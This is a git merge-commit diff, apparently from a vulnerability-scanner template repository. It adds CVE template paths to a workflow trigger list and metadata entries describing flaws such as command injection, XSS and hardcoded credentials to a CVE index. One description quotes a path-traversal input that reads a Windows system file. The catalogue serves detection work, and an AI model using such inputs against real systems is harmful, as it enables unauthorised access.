Merge branch 'main' into CVE-2024-6781
commit
731cd94d01
|
@ -4,14 +4,20 @@ on:
|
||||||
paths:
|
paths:
|
||||||
- '.new-additions'
|
- '.new-additions'
|
||||||
- 'http/cves/2022/CVE-2022-27043.yaml'
|
- 'http/cves/2022/CVE-2022-27043.yaml'
|
||||||
|
- 'http/cves/2023/CVE-2023-43323.yaml'
|
||||||
- 'http/cves/2023/CVE-2023-44393.yaml'
|
- 'http/cves/2023/CVE-2023-44393.yaml'
|
||||||
|
- 'http/cves/2023/CVE-2023-5222.yaml'
|
||||||
|
- 'http/cves/2024/CVE-2024-24763.yaml'
|
||||||
|
- 'http/cves/2024/CVE-2024-34061.yaml'
|
||||||
- 'http/cves/2024/CVE-2024-39903.yaml'
|
- 'http/cves/2024/CVE-2024-39903.yaml'
|
||||||
- 'http/cves/2024/CVE-2024-39907.yaml'
|
- 'http/cves/2024/CVE-2024-39907.yaml'
|
||||||
- 'http/cves/2024/CVE-2024-6205.yaml'
|
- 'http/cves/2024/CVE-2024-6205.yaml'
|
||||||
- 'http/cves/2024/CVE-2024-6366.yaml'
|
- 'http/cves/2024/CVE-2024-6366.yaml'
|
||||||
- 'http/cves/2024/CVE-2024-6396.yaml'
|
- 'http/cves/2024/CVE-2024-6396.yaml'
|
||||||
- 'http/cves/2024/CVE-2024-6922.yaml'
|
- 'http/cves/2024/CVE-2024-6922.yaml'
|
||||||
|
- 'http/cves/2024/CVE-2024-7120.yaml'
|
||||||
- 'http/cves/2024/CVE-2024-7188.yaml'
|
- 'http/cves/2024/CVE-2024-7188.yaml'
|
||||||
|
- 'http/misconfiguration/changedetection-unauth.yaml'
|
||||||
- 'http/misconfiguration/deployment-interface-exposed.yaml'
|
- 'http/misconfiguration/deployment-interface-exposed.yaml'
|
||||||
- 'http/misconfiguration/installer/quickcms-installer.yaml'
|
- 'http/misconfiguration/installer/quickcms-installer.yaml'
|
||||||
- 'http/misconfiguration/manage-cabinet-register.yaml'
|
- 'http/misconfiguration/manage-cabinet-register.yaml'
|
||||||
|
@ -19,6 +25,7 @@ on:
|
||||||
- 'http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml'
|
- 'http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml'
|
||||||
- 'http/vulnerabilities/esafenet/esafenet-noticeajax-sqli.yaml'
|
- 'http/vulnerabilities/esafenet/esafenet-noticeajax-sqli.yaml'
|
||||||
- 'http/vulnerabilities/landray/landray-oa-replaceextend-rce.yaml'
|
- 'http/vulnerabilities/landray/landray-oa-replaceextend-rce.yaml'
|
||||||
|
- 'javascript/misconfiguration/x11/x11-unauth-access.yaml'
|
||||||
workflow_dispatch:
|
workflow_dispatch:
|
||||||
jobs:
|
jobs:
|
||||||
triggerRemoteWorkflow:
|
triggerRemoteWorkflow:
|
||||||
|
|
|
@ -1,12 +1,18 @@
|
||||||
http/cves/2022/CVE-2022-27043.yaml
|
http/cves/2022/CVE-2022-27043.yaml
|
||||||
|
http/cves/2023/CVE-2023-43323.yaml
|
||||||
http/cves/2023/CVE-2023-44393.yaml
|
http/cves/2023/CVE-2023-44393.yaml
|
||||||
|
http/cves/2023/CVE-2023-5222.yaml
|
||||||
|
http/cves/2024/CVE-2024-24763.yaml
|
||||||
|
http/cves/2024/CVE-2024-34061.yaml
|
||||||
http/cves/2024/CVE-2024-39903.yaml
|
http/cves/2024/CVE-2024-39903.yaml
|
||||||
http/cves/2024/CVE-2024-39907.yaml
|
http/cves/2024/CVE-2024-39907.yaml
|
||||||
http/cves/2024/CVE-2024-6205.yaml
|
http/cves/2024/CVE-2024-6205.yaml
|
||||||
http/cves/2024/CVE-2024-6366.yaml
|
http/cves/2024/CVE-2024-6366.yaml
|
||||||
http/cves/2024/CVE-2024-6396.yaml
|
http/cves/2024/CVE-2024-6396.yaml
|
||||||
http/cves/2024/CVE-2024-6922.yaml
|
http/cves/2024/CVE-2024-6922.yaml
|
||||||
|
http/cves/2024/CVE-2024-7120.yaml
|
||||||
http/cves/2024/CVE-2024-7188.yaml
|
http/cves/2024/CVE-2024-7188.yaml
|
||||||
|
http/misconfiguration/changedetection-unauth.yaml
|
||||||
http/misconfiguration/deployment-interface-exposed.yaml
|
http/misconfiguration/deployment-interface-exposed.yaml
|
||||||
http/misconfiguration/installer/quickcms-installer.yaml
|
http/misconfiguration/installer/quickcms-installer.yaml
|
||||||
http/misconfiguration/manage-cabinet-register.yaml
|
http/misconfiguration/manage-cabinet-register.yaml
|
||||||
|
@ -14,3 +20,4 @@ http/osint/user-enumeration/substack.yaml
|
||||||
http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml
|
http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml
|
||||||
http/vulnerabilities/esafenet/esafenet-noticeajax-sqli.yaml
|
http/vulnerabilities/esafenet/esafenet-noticeajax-sqli.yaml
|
||||||
http/vulnerabilities/landray/landray-oa-replaceextend-rce.yaml
|
http/vulnerabilities/landray/landray-oa-replaceextend-rce.yaml
|
||||||
|
javascript/misconfiguration/x11/x11-unauth-access.yaml
|
||||||
|
|
|
@ -2276,6 +2276,7 @@
|
||||||
{"ID":"CVE-2023-43187","Info":{"Name":"NodeBB XML-RPC Request xmlrpc.php - XML Injection","Severity":"critical","Description":"A remote code execution (RCE) vulnerability in the xmlrpc.php endpoint of NodeBB Inc NodeBB forum software prior to v1.18.6 allows attackers to execute arbitrary code via crafted XML-RPC requests.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43187.yaml"}
|
{"ID":"CVE-2023-43187","Info":{"Name":"NodeBB XML-RPC Request xmlrpc.php - XML Injection","Severity":"critical","Description":"A remote code execution (RCE) vulnerability in the xmlrpc.php endpoint of NodeBB Inc NodeBB forum software prior to v1.18.6 allows attackers to execute arbitrary code via crafted XML-RPC requests.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43187.yaml"}
|
||||||
{"ID":"CVE-2023-43208","Info":{"Name":"NextGen Healthcare Mirth Connect - Remote Code Execution","Severity":"critical","Description":"Unauthenticated remote code execution vulnerability in NextGen Healthcare Mirth Connect before version 4.4.1.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43208.yaml"}
|
{"ID":"CVE-2023-43208","Info":{"Name":"NextGen Healthcare Mirth Connect - Remote Code Execution","Severity":"critical","Description":"Unauthenticated remote code execution vulnerability in NextGen Healthcare Mirth Connect before version 4.4.1.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43208.yaml"}
|
||||||
{"ID":"CVE-2023-43261","Info":{"Name":"Milesight Routers - Information Disclosure","Severity":"high","Description":"A critical security vulnerability has been identified in Milesight Industrial Cellular Routers, compromising the security of sensitive credentials and permitting unauthorized access. This vulnerability stems from a misconfiguration that results in directory listing being enabled on the router systems, rendering log files publicly accessible. These log files, while containing sensitive information such as admin and other user passwords (encrypted as a security measure), can be exploited by attackers via the router's web interface. The presence of a hardcoded AES secret key and initialization vector (IV) in the JavaScript code further exacerbates the situation, facilitating the decryption of these passwords. This chain of vulnerabilities allows malicious actors to gain unauthorized access to the router.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-43261.yaml"}
|
{"ID":"CVE-2023-43261","Info":{"Name":"Milesight Routers - Information Disclosure","Severity":"high","Description":"A critical security vulnerability has been identified in Milesight Industrial Cellular Routers, compromising the security of sensitive credentials and permitting unauthorized access. This vulnerability stems from a misconfiguration that results in directory listing being enabled on the router systems, rendering log files publicly accessible. These log files, while containing sensitive information such as admin and other user passwords (encrypted as a security measure), can be exploited by attackers via the router's web interface. The presence of a hardcoded AES secret key and initialization vector (IV) in the JavaScript code further exacerbates the situation, facilitating the decryption of these passwords. This chain of vulnerabilities allows malicious actors to gain unauthorized access to the router.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-43261.yaml"}
|
||||||
|
{"ID":"CVE-2023-43323","Info":{"Name":"mooSocial 3.1.8 - External Service Interaction","Severity":"medium","Description":"mooSocial 3.1.8 is vulnerable to external service interaction via multiple parameters in the post function.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-43323.yaml"}
|
||||||
{"ID":"CVE-2023-43325","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in the data[redirect_url] parameter on user login function of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-43325.yaml"}
|
{"ID":"CVE-2023-43325","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in the data[redirect_url] parameter on user login function of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-43325.yaml"}
|
||||||
{"ID":"CVE-2023-43326","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in multiple url of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-43326.yaml"}
|
{"ID":"CVE-2023-43326","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in multiple url of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-43326.yaml"}
|
||||||
{"ID":"CVE-2023-43374","Info":{"Name":"Hoteldruid v3.0.5 - SQL Injection","Severity":"critical","Description":"Hoteldruid v3.0.5 was discovered to contain a SQL injection vulnerability via the id_utente_log parameter at /hoteldruid/personalizza.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43374.yaml"}
|
{"ID":"CVE-2023-43374","Info":{"Name":"Hoteldruid v3.0.5 - SQL Injection","Severity":"critical","Description":"Hoteldruid v3.0.5 was discovered to contain a SQL injection vulnerability via the id_utente_log parameter at /hoteldruid/personalizza.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43374.yaml"}
|
||||||
|
@ -2338,6 +2339,7 @@
|
||||||
{"ID":"CVE-2023-51449","Info":{"Name":"Gradio Hugging Face - Local File Inclusion","Severity":"high","Description":"Gradio LFI when auth is not enabled, affects versions 4.0 - 4.10, also works against Gradio \u003c 3.33\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-51449.yaml"}
|
{"ID":"CVE-2023-51449","Info":{"Name":"Gradio Hugging Face - Local File Inclusion","Severity":"high","Description":"Gradio LFI when auth is not enabled, affects versions 4.0 - 4.10, also works against Gradio \u003c 3.33\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-51449.yaml"}
|
||||||
{"ID":"CVE-2023-51467","Info":{"Name":"Apache OFBiz \u003c 18.12.11 - Remote Code Execution","Severity":"critical","Description":"The vulnerability allows attackers to bypass authentication to achieve a simple Server-Side Request Forgery (SSRF)\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-51467.yaml"}
|
{"ID":"CVE-2023-51467","Info":{"Name":"Apache OFBiz \u003c 18.12.11 - Remote Code Execution","Severity":"critical","Description":"The vulnerability allows attackers to bypass authentication to achieve a simple Server-Side Request Forgery (SSRF)\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-51467.yaml"}
|
||||||
{"ID":"CVE-2023-52085","Info":{"Name":"Winter CMS Local File Inclusion - (LFI)","Severity":"medium","Description":"Winter is a free, open-source content management system. Users with access to backend forms that include a ColorPicker FormWidget can provide a value that would then be included without further processing in the compilation of custom stylesheets via LESS. This had the potential to lead to a Local File Inclusion vulnerability. This issue has been patched in v1.2.4.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-52085.yaml"}
|
{"ID":"CVE-2023-52085","Info":{"Name":"Winter CMS Local File Inclusion - (LFI)","Severity":"medium","Description":"Winter is a free, open-source content management system. Users with access to backend forms that include a ColorPicker FormWidget can provide a value that would then be included without further processing in the compilation of custom stylesheets via LESS. This had the potential to lead to a Local File Inclusion vulnerability. This issue has been patched in v1.2.4.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-52085.yaml"}
|
||||||
|
{"ID":"CVE-2023-5222","Info":{"Name":"Viessmann Vitogate 300 - Hardcoded Password","Severity":"critical","Description":"A critical vulnerability in Viessmann Vitogate 300 up to 2.1.3.0 allows attackers to authenticate using hardcoded credentials in the Web Management Interface.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5222.yaml"}
|
||||||
{"ID":"CVE-2023-52251","Info":{"Name":"Kafka UI 0.7.1 Command Injection","Severity":"high","Description":"An issue discovered in provectus kafka-ui 0.4.0 through 0.7.1 allows remote attackers to execute arbitrary code via the q parameter of /api/clusters/local/topics/{topic}/messages.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-52251.yaml"}
|
{"ID":"CVE-2023-52251","Info":{"Name":"Kafka UI 0.7.1 Command Injection","Severity":"high","Description":"An issue discovered in provectus kafka-ui 0.4.0 through 0.7.1 allows remote attackers to execute arbitrary code via the q parameter of /api/clusters/local/topics/{topic}/messages.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-52251.yaml"}
|
||||||
{"ID":"CVE-2023-5244","Info":{"Name":"Microweber \u003c V.2.0 - Cross-Site Scripting","Severity":"medium","Description":"Reflected Cross-Site Scripting Vulnerability in types GET parameter on the /editor_tools/rte_image_editor endpoint.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5244.yaml"}
|
{"ID":"CVE-2023-5244","Info":{"Name":"Microweber \u003c V.2.0 - Cross-Site Scripting","Severity":"medium","Description":"Reflected Cross-Site Scripting Vulnerability in types GET parameter on the /editor_tools/rte_image_editor endpoint.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5244.yaml"}
|
||||||
{"ID":"CVE-2023-5360","Info":{"Name":"WordPress Royal Elementor Addons Plugin \u003c= 1.3.78 - Arbitrary File Upload","Severity":"critical","Description":"Arbitrary File Upload vulnerability in WordPress Royal Elementor Addons Plugin. This could allow a malicious actor to upload any type of file to your website. This can include backdoors which are then executed to gain further access to your website. This vulnerability has been fixed in version 1.3.79\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5360.yaml"}
|
{"ID":"CVE-2023-5360","Info":{"Name":"WordPress Royal Elementor Addons Plugin \u003c= 1.3.78 - Arbitrary File Upload","Severity":"critical","Description":"Arbitrary File Upload vulnerability in WordPress Royal Elementor Addons Plugin. This could allow a malicious actor to upload any type of file to your website. This can include backdoors which are then executed to gain further access to your website. This vulnerability has been fixed in version 1.3.79\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5360.yaml"}
|
||||||
|
@ -2416,6 +2418,7 @@
|
||||||
{"ID":"CVE-2024-24112","Info":{"Name":"Exrick XMall - SQL Injection","Severity":"critical","Description":"XMall v1.1 was discovered to contain a SQL injection vulnerability via the 'orderDir' parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-24112.yaml"}
|
{"ID":"CVE-2024-24112","Info":{"Name":"Exrick XMall - SQL Injection","Severity":"critical","Description":"XMall v1.1 was discovered to contain a SQL injection vulnerability via the 'orderDir' parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-24112.yaml"}
|
||||||
{"ID":"CVE-2024-24131","Info":{"Name":"SuperWebMailer 9.31.0.01799 - Cross-Site Scripting","Severity":"medium","Description":"SuperWebMailer v9.31.0.01799 was discovered to contain a reflected cross-site scripting (XSS) vulenrability via the component api.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-24131.yaml"}
|
{"ID":"CVE-2024-24131","Info":{"Name":"SuperWebMailer 9.31.0.01799 - Cross-Site Scripting","Severity":"medium","Description":"SuperWebMailer v9.31.0.01799 was discovered to contain a reflected cross-site scripting (XSS) vulenrability via the component api.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-24131.yaml"}
|
||||||
{"ID":"CVE-2024-24565","Info":{"Name":"CrateDB Database - Arbitrary File Read","Severity":"medium","Description":"CrateDB is a distributed SQL database that makes it simple to store and analyze massive amounts of data in real-time. There is a COPY FROM function in the CrateDB database that is used to import file data into database tables. This function has a flaw, and authenticated attackers can use the COPY FROM function to import arbitrary file content into database tables, resulting in information leakage.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2024/CVE-2024-24565.yaml"}
|
{"ID":"CVE-2024-24565","Info":{"Name":"CrateDB Database - Arbitrary File Read","Severity":"medium","Description":"CrateDB is a distributed SQL database that makes it simple to store and analyze massive amounts of data in real-time. There is a COPY FROM function in the CrateDB database that is used to import file data into database tables. This function has a flaw, and authenticated attackers can use the COPY FROM function to import arbitrary file content into database tables, resulting in information leakage.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2024/CVE-2024-24565.yaml"}
|
||||||
|
{"ID":"CVE-2024-24763","Info":{"Name":"JumpServer \u003c 3.10.0 - Open Redirect","Severity":"medium","Description":"JumpServer is an open source bastion host and an operation and maintenance security audit system. Prior to version 3.10.0, attackers can exploit this vulnerability to construct malicious links, leading users to click on them, thereby facilitating phishing attacks or cross-site scripting attacks. Version 3.10.0 contains a patch for this issue. No known workarounds are available.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-24763.yaml"}
|
||||||
{"ID":"CVE-2024-24919","Info":{"Name":"Check Point Quantum Gateway - Information Disclosure","Severity":"high","Description":"CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN, or mobile access software blade.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-24919.yaml"}
|
{"ID":"CVE-2024-24919","Info":{"Name":"Check Point Quantum Gateway - Information Disclosure","Severity":"high","Description":"CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN, or mobile access software blade.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-24919.yaml"}
|
||||||
{"ID":"CVE-2024-25600","Info":{"Name":"Unauthenticated Remote Code Execution – Bricks \u003c= 1.9.6","Severity":"critical","Description":"Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks \u003c= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25600.yaml"}
|
{"ID":"CVE-2024-25600","Info":{"Name":"Unauthenticated Remote Code Execution – Bricks \u003c= 1.9.6","Severity":"critical","Description":"Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks \u003c= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25600.yaml"}
|
||||||
{"ID":"CVE-2024-25669","Info":{"Name":"CaseAware a360inc - Cross-Site Scripting","Severity":"medium","Description":"a360inc CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. This is a bypass of the fix reported in CVE-2017-\u003e\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-25669.yaml"}
|
{"ID":"CVE-2024-25669","Info":{"Name":"CaseAware a360inc - Cross-Site Scripting","Severity":"medium","Description":"a360inc CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. This is a bypass of the fix reported in CVE-2017-\u003e\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-25669.yaml"}
|
||||||
|
@ -2467,6 +2470,7 @@
|
||||||
{"ID":"CVE-2024-33610","Info":{"Name":"Sharp Multifunction Printers - Cookie Exposure","Severity":"medium","Description":"It was observed that Sharp printers are vulnerable to a listing of session cookies without authentication. Any attacker can list valid cookies by visiting a backdoor webpage and use them to authenticate to the printers.","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2024/CVE-2024-33610.yaml"}
|
{"ID":"CVE-2024-33610","Info":{"Name":"Sharp Multifunction Printers - Cookie Exposure","Severity":"medium","Description":"It was observed that Sharp printers are vulnerable to a listing of session cookies without authentication. Any attacker can list valid cookies by visiting a backdoor webpage and use them to authenticate to the printers.","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2024/CVE-2024-33610.yaml"}
|
||||||
{"ID":"CVE-2024-33724","Info":{"Name":"SOPlanning 1.52.00 Cross Site Scripting","Severity":"medium","Description":"SOPlanning v1.52.00 is vulnerable to XSS via the 'groupe_id' parameters a remote unautheticated attacker can hijack the admin account or other users. The remote attacker can hijack a users session or credentials and perform a takeover of the entire platform.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-33724.yaml"}
|
{"ID":"CVE-2024-33724","Info":{"Name":"SOPlanning 1.52.00 Cross Site Scripting","Severity":"medium","Description":"SOPlanning v1.52.00 is vulnerable to XSS via the 'groupe_id' parameters a remote unautheticated attacker can hijack the admin account or other users. The remote attacker can hijack a users session or credentials and perform a takeover of the entire platform.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-33724.yaml"}
|
||||||
{"ID":"CVE-2024-3400","Info":{"Name":"GlobalProtect - OS Command Injection","Severity":"critical","Description":"A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-3400.yaml"}
|
{"ID":"CVE-2024-3400","Info":{"Name":"GlobalProtect - OS Command Injection","Severity":"critical","Description":"A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-3400.yaml"}
|
||||||
|
{"ID":"CVE-2024-34061","Info":{"Name":"Changedetection.io \u003c=v0.45.21 - Cross-Site Scripting","Severity":"medium","Description":"Changedetection.io is a free open source web page change detection, website watcher, restock monitor and notification service. In affected versions Input in parameter notification_urls is not processed resulting in javascript execution in the application. A reflected XSS vulnerability happens when the user input from a URL or POST data is reflected on the page without being stored, thus allowing the attacker to inject malicious content. This issue has been addressed in version 0.45.22. Users are advised to upgrade. There are no known workarounds for this vulnerability.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-34061.yaml"}
|
||||||
{"ID":"CVE-2024-34102","Info":{"Name":"Adobe Commerce \u0026 Magento - CosmicSting","Severity":"critical","Description":"Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-34102.yaml"}
|
{"ID":"CVE-2024-34102","Info":{"Name":"Adobe Commerce \u0026 Magento - CosmicSting","Severity":"critical","Description":"Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-34102.yaml"}
|
||||||
{"ID":"CVE-2024-34257","Info":{"Name":"TOTOLINK EX1800T TOTOLINK EX1800T - Command Injection","Severity":"high","Description":"TOTOLINK EX1800T V9.1.0cu.2112_B20220316 has a vulnerability in the apcliEncrypType parameter that allows unauthorized execution of arbitrary commands, allowing an attacker to obtain device administrator privileges.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-34257.yaml"}
|
{"ID":"CVE-2024-34257","Info":{"Name":"TOTOLINK EX1800T TOTOLINK EX1800T - Command Injection","Severity":"high","Description":"TOTOLINK EX1800T V9.1.0cu.2112_B20220316 has a vulnerability in the apcliEncrypType parameter that allows unauthorized execution of arbitrary commands, allowing an attacker to obtain device administrator privileges.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-34257.yaml"}
|
||||||
{"ID":"CVE-2024-34351","Info":{"Name":"Next.js - Server Side Request Forgery (SSRF)","Severity":"high","Description":"Next.Js, inferior to version 14.1.1, have its image optimization built-in component prone to SSRF.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-34351.yaml"}
|
{"ID":"CVE-2024-34351","Info":{"Name":"Next.js - Server Side Request Forgery (SSRF)","Severity":"high","Description":"Next.Js, inferior to version 14.1.1, have its image optimization built-in component prone to SSRF.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-34351.yaml"}
|
||||||
|
@ -2521,6 +2525,7 @@
|
||||||
{"ID":"CVE-2024-6646","Info":{"Name":"Netgear-WN604 downloadFile.php - Information Disclosure","Severity":"medium","Description":"There is an information leakage vulnerability in the downloadFile.php interface of Netgear WN604. A remote attacker using file authentication can use this vulnerability to obtain the administrator account and password information of the wireless router, causing the router's background to be controlled. The attacker can initiate damage to the wireless network or further threaten it.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-6646.yaml"}
|
{"ID":"CVE-2024-6646","Info":{"Name":"Netgear-WN604 downloadFile.php - Information Disclosure","Severity":"medium","Description":"There is an information leakage vulnerability in the downloadFile.php interface of Netgear WN604. A remote attacker using file authentication can use this vulnerability to obtain the administrator account and password information of the wireless router, causing the router's background to be controlled. The attacker can initiate damage to the wireless network or further threaten it.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-6646.yaml"}
|
||||||
{"ID":"CVE-2024-6746","Info":{"Name":"EasySpider 0.6.2 - Arbitrary File Read","Severity":"medium","Description":"A vulnerability classified as problematic was found in NaiboWang EasySpider 0.6.2 on Windows. Affected by this vulnerability is an unknown functionality of the file \\EasySpider\\resources\\app\\server.js of the component HTTP GET Request Handler. The manipulation with the input /../../../../../../../../../Windows/win.ini leads to path traversal: '../filedir'. The attack needs to be done within the local network.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-6746.yaml"}
|
{"ID":"CVE-2024-6746","Info":{"Name":"EasySpider 0.6.2 - Arbitrary File Read","Severity":"medium","Description":"A vulnerability classified as problematic was found in NaiboWang EasySpider 0.6.2 on Windows. Affected by this vulnerability is an unknown functionality of the file \\EasySpider\\resources\\app\\server.js of the component HTTP GET Request Handler. The manipulation with the input /../../../../../../../../../Windows/win.ini leads to path traversal: '../filedir'. The attack needs to be done within the local network.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-6746.yaml"}
|
||||||
{"ID":"CVE-2024-6922","Info":{"Name":"Automation Anywhere Automation 360 - Server-Side Request Forgery","Severity":"high","Description":"Automation Anywhere Automation 360 v21-v32 is vulnerable to Server-Side Request Forgery in a web API component.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-6922.yaml"}
|
{"ID":"CVE-2024-6922","Info":{"Name":"Automation Anywhere Automation 360 - Server-Side Request Forgery","Severity":"high","Description":"Automation Anywhere Automation 360 v21-v32 is vulnerable to Server-Side Request Forgery in a web API component.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-6922.yaml"}
|
||||||
|
{"ID":"CVE-2024-7120","Info":{"Name":"Raisecom MSG1200, MSG2100E, MSG2200 and MSG2300 3.90 - Command Injection","Severity":"medium","Description":"A vulnerability, which was classified as critical, was found in Raisecom MSG1200, MSG2100E, MSG2200 and MSG2300 3.90. This affects an unknown part of the file list_base_config.php of the component Web Interface. The manipulation of the argument template leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-272451.\n","Classification":{"CVSSScore":"6.3"}},"file_path":"http/cves/2024/CVE-2024-7120.yaml"}
|
||||||
{"ID":"CVE-2024-7188","Info":{"Name":"Bylancer Quicklancer 2.4 G - SQL Injection","Severity":"high","Description":"A SQL injection vulnerability exists in the Quicklancer 2.4, GET parameter 'range2', that has time-based blind SQL injection and a boolean-based blind SQL injection, which can be exploited remotely by unauthenticated attacker to execute arbitrary SQL queries in the database.\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-7188.yaml"}
|
